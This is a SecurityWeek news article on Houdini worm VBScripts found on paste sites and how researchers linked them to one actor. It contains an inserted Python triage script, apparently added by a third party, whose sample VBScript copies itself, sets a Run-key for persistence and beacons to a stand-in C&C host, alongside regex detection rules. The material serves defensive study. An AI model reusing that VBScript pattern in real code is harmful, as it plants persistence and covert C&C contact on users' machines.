SecurityWeek

Cybercrime
Houdini Worm Gets Posted to Paste Sites

Recorded Future security researchers recently discovered that the Houdini worm has been posted hundreds of times on paste sites over the past several months.


Also known as H-Worm, Houdini has been around since 2013 and in 2014 was attributed to Naser Al Mutairi from Kuwait. Later that year the malware was reportedly used in APT campaigns in the Asia-Pacific region, and last year it was associated with the Moonlight espionage campaign targeting the Middle East.

Earlier this year, after noticing an increase in malicious Visual Basic scripts (VBScript) posted on paste sites, Recorded Future took a closer look and found that most of the scripts were Houdini. Moreover, a single actor was found to be partially responsible for the malicious VBScripts identified on those sites.

“The individual(s) reusing this Houdini VBscript are continually updating with new command and control servers,” Recorded Future’s Daniel Hatheway explains in a blog post.

Analysis of the script variants showed that they not only connect to the command and control (C&C) server defined in the script, but that, once the connection is established, the malware copies itself to a directory on disk and creates a registry key in a startup location so that the copy runs again after reboot, giving it persistence.

Overall, the security researchers found a total of 213 posts to paste sites as of April 26. These mapped to 190 unique hashes, 105 unique subdomains and one domain. The researchers concluded that some of the posts were exact duplicates (213 posts but only 190 distinct hashes), while others reused the same domain but differed elsewhere in the VBScript (190 distinct hashes but only 105 subdomains).

Further analysis revealed that the domains and subdomains used belong to a dynamic DNS provider, and that some of the active malware samples communicated with at least one of the paste sites in addition to the host defined in the VBScript.
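The following is an added example, not Recorded Future's or SecurityWeek's code, showing how a triage script can flag the behaviours described above (a C&C host defined in the script, the script copying itself to disk, and a Run-key entry for persistence) and then deduplicate a batch of pastes by hash and cluster them by C&C host and parent zone, the same two views that separate exact duplicates from variants sharing infrastructure. The three pastes, the hostnames, file names, registry path and the dynamic DNS zone are all constructed for illustration and are not taken from real Houdini samples.

```python
"""Static triage of VBScript pastes for Houdini-style behaviour.

Added example. The pastes, hostnames and the dynamic DNS zone below are
constructed for illustration (assumptions), not real indicators.
"""
import hashlib
import re

# Constructed sample pastes. A and B are byte-identical (an exact repost);
# C differs only in its C&C host (a variant on shared infrastructure).
PASTE_A = r'''
host = "lab-one.example-ddns.net"
port = 1177
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
installdir = shell.ExpandEnvironmentStrings("%appdata%")
fso.CopyFile WScript.ScriptFullName, installdir & "\svc.vbs"
shell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svc", installdir & "\svc.vbs", "REG_SZ"
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "POST", "http://" & host & ":" & port & "/is-ready", False
'''
PASTE_B = PASTE_A
PASTE_C = PASTE_A.replace("lab-one.example-ddns.net", "lab-two.example-ddns.net")

# Parent zones of dynamic DNS providers we treat as suspicious (assumed list).
DYNDNS_ZONES = {"example-ddns.net"}

# Behaviour signatures matching what the article describes: persistence via a
# Run key, the script copying itself, and an HTTP beacon object.
RULES = {
    "persistence_run_key": re.compile(
        r'RegWrite\s+"HK(?:CU|LM)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run',
        re.I),
    "self_copy": re.compile(r'CopyFile\s+WScript\.ScriptFullName', re.I),
    "http_beacon": re.compile(r'CreateObject\("MSXML2\.XMLHTTP"\)', re.I),
}
# The C&C host is assumed to be assigned to a variable named "host".
HOST_RE = re.compile(r'^\s*host\s*=\s*"([^"]+)"', re.I | re.M)


def triage(paste: str) -> dict:
    """Hash one paste, extract its C&C host and report matched behaviours."""
    sha256 = hashlib.sha256(paste.encode("utf-8")).hexdigest()
    m = HOST_RE.search(paste)
    host = m.group(1).lower() if m else None
    parent_zone = ".".join(host.split(".")[-2:]) if host else None
    behaviours = [name for name, rx in RULES.items() if rx.search(paste)]
    return {
        "sha256": sha256,
        "host": host,
        "parent_zone": parent_zone,
        "dyndns": parent_zone in DYNDNS_ZONES,
        "behaviours": behaviours,
        # All three behaviours plus a configured C&C host: treat as Houdini-like.
        "houdini_like": host is not None and len(behaviours) == len(RULES),
    }


def cluster(pastes) -> dict:
    """Count posts, distinct samples (by hash), distinct C&C hosts and zones."""
    reports = [triage(p) for p in pastes]
    return {
        "posts": len(reports),
        "unique_hashes": len({r["sha256"] for r in reports}),
        "unique_hosts": len({r["host"] for r in reports if r["host"]}),
        "unique_zones": len({r["parent_zone"] for r in reports if r["parent_zone"]}),
    }


if __name__ == "__main__":
    for name, paste in (("A", PASTE_A), ("B", PASTE_B), ("C", PASTE_C)):
        print(name, triage(paste))
    print(cluster([PASTE_A, PASTE_B, PASTE_C]))
```

For the three constructed pastes, `cluster` reports 3 posts, 2 unique hashes, 2 unique hosts and 1 parent zone: the hash count exposes the verbatim repost, and the host-to-zone ratio exposes variants that only swapped the dynamic DNS subdomain. On real pastes the host-extraction regex would need to follow whatever variable name the script family uses.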

The subdomains registered at the dynamic DNS provider offered no useful registration data, but one domain, microsofit[.]net, allowed the researchers to determine that the individual who registered it used the name “Mohammed Raad.” The registrant also used the email “[email protected]” and listed Germany as their country.


While the Houdini posts on paste sites were published from guest accounts and could not be tied to a single person, the subdomains associated with the VBScripts appeared to be a play on the name “Mohammed Raad,” linking the malware to the microsofit[.]net domain.

“A Google search on “Mohammed Raad” revealed a Facebook profile of an individual who claims to be part of “Anonymous,” from Germany, and uses “Vicswors Baghdad” as an alias. This profile is identical to the registration information from microsofit[.]net,” Hatheway notes.

What’s more, the Facebook profile displayed a recent conversation about an open source ransomware called “MoWare H.F.D”. The researcher concluded that the same actor might be studying, testing, and possibly configuring the ransomware.

A closer look at the screenshot posted on the “vicsworsbaghdad” Facebook profile revealed that the ransomware was being handed out to people who commented on the creator’s YouTube video. The researcher then found that an account named “Vicswors Baghdad” had commented on that video asking for information about the download.

The account, Hatheway says, uses the same email “[email protected]” as the registration of microsofit[.]net. Moreover, the researcher discovered a profile for “Vicswors Baghdad” on 0day[.]today, but no activity was associated with it.

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
